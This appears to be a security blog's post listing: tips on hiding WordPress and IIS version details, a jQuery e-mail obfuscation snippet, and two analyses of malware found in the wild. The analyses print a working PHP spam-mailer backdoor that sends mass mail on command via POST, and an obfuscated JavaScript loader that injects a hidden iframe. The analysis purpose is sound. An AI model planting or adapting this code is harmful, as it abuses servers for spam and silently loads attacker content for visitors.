How to obscure your WordPress version and troll the attacker a little…

One of my company’s WordPress installations has been hacked by Turkish hackers recently. After quick investigation I’ve found that script version was little bit old (not a very popular website, mea culpa, not updated very often). In case you didn’t know, WordPress is bundled with readme file by default. I’ve found that malicious scripts or people use that to determine your version’s branch. So I’ve decided to Troll them a little bit… Continue reading How to obscure your WordPress version and troll the attacker a little…

Simpliest way to obfuscate e-mail address using jQuery

Here is a simpliest jQuery code to protect e-mail addresses on your website from spam bots. Just put this in a script tag into the head section:

$(window).load(function() {			
	// anti spam
	var r='random-string';
 
	$('.'+r).each(function() {
	var $this = $(this),
		value = new String($this.text());
 
		value = value.replace('['+r+']', '@');
 
		$this.replaceWith($('').text(value).attr('href', 'mailto:'+value));
	});
});

Now replace random-string with any really aleatory set of characters eg. dhhIDu338

And here is the HTML part. Publish every e-mail address on your page using this code:

Contact: <span class="random-string">johndoe[random-string]mail.com</span>

How to remove unwanted HTTP Response Headers in IIS 7.5

Hiding server software is one of ways to protect your services from hackers. It’s quite easy to obscure IIS identity. In few steps I’ll show you how to accomplish this task on WIMP stack.

Continue reading How to remove unwanted HTTP Response Headers in IIS 7.5

PHP malicious code analysis no. 1

I found this piece of a PHP malware code on a compromised web server that I started to administer. It’s name was random character string eg. acbjxuu.php. There were about 20 more scripts of this kind. It’s rather very simple script for spaming purposes. For your understanding I’ve wrote what it’s doing in comments between code lines.

if (isset($_POST['task']))
{
	// be sure to display all PHP errors
	error_reporting(E_ALL);
	ini_set('display_errors', TRUE);
	// disable default PHP memory limit
	ini_set('memory_limit', '512M');
	// disable PHP execution time limit
	set_time_limit(0);
	ini_set('max_execution_time',0);
	ini_set('set_time_limit',0);
 
	// get serialized array from POST var named task
	// example array structure: array(array('to'=&gt;'example@mail.com', 'msg'=&gt;'message content', 'subj'=&gt;'Message subject ex. cheap cialis :)'));
	$x = unserialize(base64_decode($_POST['task']));
 
	// if task variable was wrongly serialized, just die silently...
	if ($x==false) {exit();}
 
 
	$send_from = base64_encode('http://'.$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']);
 
	// now send half a million of viagra &amp; cialis related mails... 
	foreach ($x as $arr)
	{
		echo $arr['to']."\r\n";
 
		$arr['msg'] = str_replace('[send_from_url]',$send_from,$arr['msg']);
 
		mail($arr['to'],$arr['subj'],$arr['msg'],"MIME-Version: 1.0\r\nContent-type: text/html; charset=windows-1251\r\n");
	}
	exit('SEND OK');
}

I’ll look in logs for IP addresses that tried to reach for this scripts. Maybe I’ll find something interesting. Wish me good luck and monitor your webserver contents!

Oldschool javascript malicious code analysis

I found this olschool piece of poorly obfuscated code during web surfing. Some time ago I decided to collect this kind of stuff for learning purposes… So here you have first one:

var temp="",i,c=0,out="";
var if_uniq_var="02102008-01";
var str="60!105!102!114!97!109!101!32!115!114!99!61!34!100!111!99!104!101!108!112!49!46!104!116!109!108!34!32!102!114!97!109!101!98!111!114!100!101!114!61!34!48!34!32!115!116!121!108!101!61!34!100!105!115!112!108!97!121!58!110!111!110!101!34!62!60!47!105!102!114!97!109!101!62!";
l=str.length;
while(c&lt;=str.length-1)
{
    while(str.charAt(c)!='!')temp=temp+str.charAt(c++);
    c++;
    out=out+String.fromCharCode(temp);
    temp="";
}
document.write(out);

Strange string with exclamation marks simply stands for:

<iframe style="display: none;" src="dochelp1.html" width="320" height="240" frameborder="0"></iframe>

So this piece of code simply attaches invisible frame to a current document. I didn’t find dochelp1.html on a server with infected website but after googling a while I found it’s contents:

 

Website that’s trying to redirect you to looks dead. This malware isn’t active anymore. I cannot investigare further. End of a story.

Infected source: www.galeriadla.art.pl